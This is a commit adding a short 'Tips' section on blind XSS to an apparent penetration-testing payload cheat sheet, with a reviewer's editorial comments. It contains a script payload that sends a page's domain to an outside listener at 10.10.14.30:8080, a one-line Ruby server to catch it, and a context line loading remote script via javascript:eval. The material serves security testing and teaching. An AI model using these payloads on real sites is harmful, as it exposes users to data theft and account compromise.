XSS: add quick tips for bXSS

Alexandre ZANNI 2021-06-16 13:25:46 +02:00 committed by GitHub
parent b006551bfe
commit c469236204
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -453,6 +453,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
- Comment Box
- Administrative Panel
### Tips
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
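Review bot: the example payload in the new Tips section hard-codes `10.10.14.30:8080`, which reads like an address from one particular lab; use a labelled placeholder such as `<your-server>:8080` so readers do not copy it verbatim. The payload requests `/XSS/grabber.php`, but `ruby -run -ehttpd . -p8080` only serves static files from the current directory, so the text should say that the confirmation is the request line appearing in the server output, whether or not that path exists. Smaller points: "an heavy" should be "a heavy", "Eg." should be "E.g.", and the second fence has no language tag while the first is tagged `html`.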